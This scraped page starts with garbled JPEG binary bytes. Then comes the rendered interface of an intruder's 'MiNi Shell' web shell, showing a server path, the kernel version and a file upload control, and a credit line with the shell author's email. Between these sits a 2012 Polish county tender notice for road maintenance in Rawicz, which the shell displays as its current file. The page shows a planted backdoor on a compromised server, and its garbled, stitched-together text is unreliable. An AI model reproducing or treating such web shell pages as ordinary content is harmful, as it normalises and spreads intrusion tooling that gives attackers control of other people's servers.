JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120124/22218-N-2012.html

<p class="kh_header"><b>Rawicz: Bieżące utrzymanie dróg powiatowych oraz wykonywanie drobnych prac naprawczych i budowlanych na drogach powiatowych na terenie powiatu rawickiego, w ciągu 2012 roku</b><br>
<b>Numer ogłoszenia: 22218 - 2012; data zamieszczenia: 24.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg , ul. Podmiejska 10, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5453474.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ogloszenia.propublico.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie dróg powiatowych oraz wykonywanie drobnych prac naprawczych i budowlanych na drogach powiatowych na terenie powiatu rawickiego, w ciągu 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest bieżące utrzymanie dróg powiatowych oraz wykonywanie drobnych prac naprawczych i budowlanych na drogach powiatowych na terenie powiatu rawickiego, w ciągu 2012 roku. Zamawiający dopuszcza składanie ofert częściowych, gdzie część (zadanie) stanowią:
Nr 1 Temat: Koszenie traw kosiarką bijakową (1 szt.). Usługa polega na dwukrotnym w ciągu roku koszeniu traw na poboczach i skarpach rowów. Wykonawca podaje cenę brutto,  za koszenie za 1 godzinę pracy kosiarki.
Nr 2	Temat: Koszenie traw kosiarką bijakową (1 szt.). Usługa polega na dwukrotnym w ciągu roku koszeniu traw na poboczach i skarpach rowów. 
Wykonawca podaje cenę brutto,  za koszenie za 1 godzinę pracy kosiarki.
Nr 3	Temat: Ścinka pobocza do grub. 20 cm. Usługa ta polega na wykonaniu ścinki pobocza do grub. 20 cm, wraz z odwozem urobku. 
Wykonawca podaje cenę brutto za 1 m2 ściętej powierzchni.
Nr 4	Temat: Wycinka drzew o średnicy 60-80 cm. Usługa polega na wycięciu drzewa, wraz z odwozem materiału na odległość do 20 km w miejsce wskazane przez Zamawiającego, na usunięciu gałęzi, odcięciu pnia w zależności od gatunku drzewa o długości 2-5 m. Grubiznę należy pociąć na odcinki  o dług. do 1 mb. Drzewo należy ściąć 20 cm poniżej krawędzi jezdni.
Wykonawca podaje cenę jednostkową brutto za wycięcie 1 szt. drzewa z uporządkowaniem.
Nr 5	Temat: Wycinka drzew o średnicy powyżej 80 cm. Usługa polega na wycięciu drzewa, wraz z odwozem materiału na odległość do 20 km w miejsce wskazane przez Zamawiającego, na usunięciu gałęzi, odcięciu pnia w zależności od gatunku drzewa o długości 2-5 m. Grubiznę należy pociąć na odcinki  o dług. do 1 mb. Drzewo należy ściąć 20 cm poniżej krawędzi jezdni.
Wykonawca podaje cenę jednostkową brutto za wycięcie 1 szt. drzewa z uporządkowaniem.
Nr 6	Temat: Frezowanie pni drzew. Usługa polega na usunięciu pozostałych pniaków po wycince drzew przy użyciu frezarki do pni. Należy sfrezować na głębokość 20 cm poniżej krawędzi jezdni. Wióry powstałe po sfrezowaniu należy usunąć.
Wykonawca podaje cenę jednostkową bruttoza sfrezowanie 1 drzewa.
Nr 7	Temat: Prześwietlanie drzew. Usługa polega na podcięciu gałęzi drzewa, usunięciu suchych gałęzi, oraz gałęzi znajdujących się w skrajni drogi, a także na usunięciu odrostów. Uzyskany materiał (gałęziówkę) należy przewieźć na miejsce wskazane przez Zamawiającego ( na odległość do 20 km). Drobne gałęzie zrąbać rębakiem do gałęzi.
Wykonawca podaje cenę jednostkową brutto za prześwietlenie 1 drzewa.
nr 8	Temat: Wycinka krzaków wraz z frezowaniem korzeni. Usługa polega na wycięciu krzewów, oraz sfrezowaniu pozostałych korzeni. Ścięte krzewy należy zrąbać przy pomocy rębaka do gałęzi.
Wykonawca podaje cenę brutto za m2 powierzchni wycinki krzewów.
Nr 9	Temat: Ustawienie krawężników betonowych 15x30x100 na ławie betonowej z oporem i podsypce cementowo-piaskowej. Usługa ta obejmuje :
- wykopanie koryta pod ławę,
- wykonanie ławy betonowej z oporem pod krawężnik,
- ustawienie krawężnika 15x30x100 na podsypce cementowo-piaskowej gr. 5 cm,
- zaspoinowanie krawężników,
Wykonawca zapewnia materiał do budowy, podaje cenę za usługę za 1 mb ustawionego krawężnika brutto.
 Z w/w usług Zamawiający będzie korzystał w razie potrzeby i w sytuacjach awaryjnych.
Nr 10	Temat: Ustawienie krawężników 20x30x100 cm. Usługa ta obejmuje :
- wykopanie koryta pod ławę,
- wykonanie ławy betonowej z oporem pod krawężnik,
- ustawienie krawężnika 20x30x100 na podsypce cementowo-piaskowej gr. 5 cm,
- zaspoinowanie krawężników,
Materiał do budowy zapewnia Inwestor, Wykonawca podaje cenę brutto za usługę za 1 mb ustawionego krawężnika.
 Z w/w usług Zamawiający będzie korzystał w razie potrzeby i w sytuacjach awaryjnych.
Nr 11	Temat: Ustawienie obrzeży betonowych 8x30x100. Usługa ta obejmuje :
- wykopanie rowka pod obrzeże,
- ustawienie obrzeży 8x30x100 na podsypce piaskowej gr. 5 cm,
- spoiny wypełnione zaprawą cementową.
Wykonawca zapewnia materiał do budowy, podaje cenę brutto za usługę za 1 mb ustawionych obrzeży.
 Z w/w usług Zamawiający będzie korzystał w razie potrzeby i w sytuacjach awaryjnych.
Nr 12	Temat: Ustawienie obrzeży betonowych o wym. 6x20x100. Usługa ta obejmuje :
- wykopanie rowka pod obrzeże,
- ustawienie obrzeży 6x20x100 na podsypce piaskowej gr. 5 cm,
- spoiny wypełnione zaprawą cementową.
Materiał do budowy zapewnia Inwestor, Wykonawca podaje cenę brutto za usługę za 1 mb ustawionych obrzeży.
 Z w/w usług Zamawiający będzie korzystał w razie potrzeby i w sytuacjach awaryjnych.
Nr 13	Temat: Wykonanie nowej studni kontrolnej kanalizacji deszczowej. Usługa ta obejmuje wykonanie nowej studzienki kanalizacyjnej, materiał dostarcza Wykonawca robót.
Z w/w usługi Zamawiający będzie korzystał w razie potrzeby i w sytuacjach awaryjnych.
Nr 14	Temat: Wykonanie nowej studni ściekowej kanalizacji deszczowej. Usługa ta obejmuje wykonanie nowej studni ściekowej, materiał dostarcza Wykonawca robót.
Z w/w usługi Zamawiający będzie korzystał w razie potrzeby i w sytuacjach awaryjnych.
Nr 15	Temat: Naprawa studni kontrolnej kanalizacji deszczowej. Usługa ta obejmuje wykonanie naprawy studni kontrolnej kanalizacji deszczowej poprzez wymianę pokrywy studni, oraz jej regulację. Materiał dostarcza Wykonawca robót.
Z w/w usługi Zamawiający będzie korzystał w razie potrzeby i w sytuacjach awaryjnych.
Nr 16	Temat: Wymiana kratki ściekowej. Usługa ta obejmuje wymianę kratki ściekowej i jej regulację. Materiał dostarcza Wykonawca robót.
Z w/w usługi Zamawiający będzie korzystał w razie potrzeby i w sytuacjach awaryjnych.
Nr 17	Temat: Naprawa uszkodzonego chodnika z kostki brukowej. Usługa ta obejmuje :
- rozebranie uszkodzonego chodnika,
- kostka brukowa typu HOLAND lub DOMINO gr. 8 cm szara, na podsypce cementowo-piaskowej gr. 5 cm
- materiał dostarcza Wykonawca,
- Wykonawca podaje cenę brutto za usługę za 1 m2.
 Z w/w usług Zamawiający będzie korzystał w razie potrzeby i w sytuacjach awaryjnych.
Nr 18	Temat: Ułożenie nowego chodnika z kostki brukowej. Usługa ta obejmuje :
- roboty ziemne wykonane koparkami, pod chodnik i pod zjazdy
- obrzeża betonowe 8x30x100, spoiny wypełnione zaprawą cementową,
- podsypka cementowo-piaskowa pod chodnik z kostki HOLAND lub DOMINO gr. 6 cm szarej,
- wykonanie podbudowy betonowej gr. 15 cm na zjazdach,
- chodnik z kostki brukowej typu HOLAND lub DOMINO gr. 6 cm szarej na podsypce cementowo-piaskowej gr 5 cm,
- chodnik z kostki brukowej typu HOLAND lub DOMINO gr. 8 cm szarej na podsypce cementowo-piaskowej gr 5 cm, na zjazdach,
- materiał dostarcza Wykonawca,
- Wykonawca podaje cenę brutto za usługę za 1 m2.
 Z w/w usług Zamawiający będzie korzystał w razie potrzeby i w sytuacjach awaryjnych.
Nr 19	Temat: Wykonanie, naprawa przyłącza kanalizacji deszczowej z rur PVC fi 160 mm. Usługa ta obejmuje wykonanie, naprawę przyłącza kanalizacji deszczowej z rur PVC fi 160 mm, materiał dostarcza Wykonawca robót.
Z w/w usługi Zamawiający będzie korzystał w razie potrzeby i w sytuacjach awaryjnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 77.11.20.00-8, 45.23.31.41-9, 77.21.15.00-7, 77.21.14.00-6, 45.23.24.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Warunek zostanie uznany za spełniony, jesli oferent wykaże, że dysponuje sprzętem odpowiednim do wykonania zamówienia. 
1) Zadanie koszenie traw: kosiarka bijakowa
2) Zadanie ścinka poboczy: ścinarka do poboczy
3) Zadanie wycinka drzew: piły spalinowe, rębak do gałęzi
4) Zadanie frezowanie pni drzew: frezarka do pni
5) Zadanie prześwietlanie drzew: podnośnik koszowy, piły spalinowe, rębak do gałęzi
6) Zadanie wycinka krzaków: piły spalinowe, rębak do gałęzi
7) Zadania związane z naprawą chodników, studni i kratek ściekowych: piły do cięcia asfaltu, stopy i płyty wibracyjne.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty, 2) Formularz cenowy, 3) Wzór umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ogloszenia.propublico.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego, pokój nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2012 godzina 09:45, miejsce: w siedzibie Zamawiającego pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com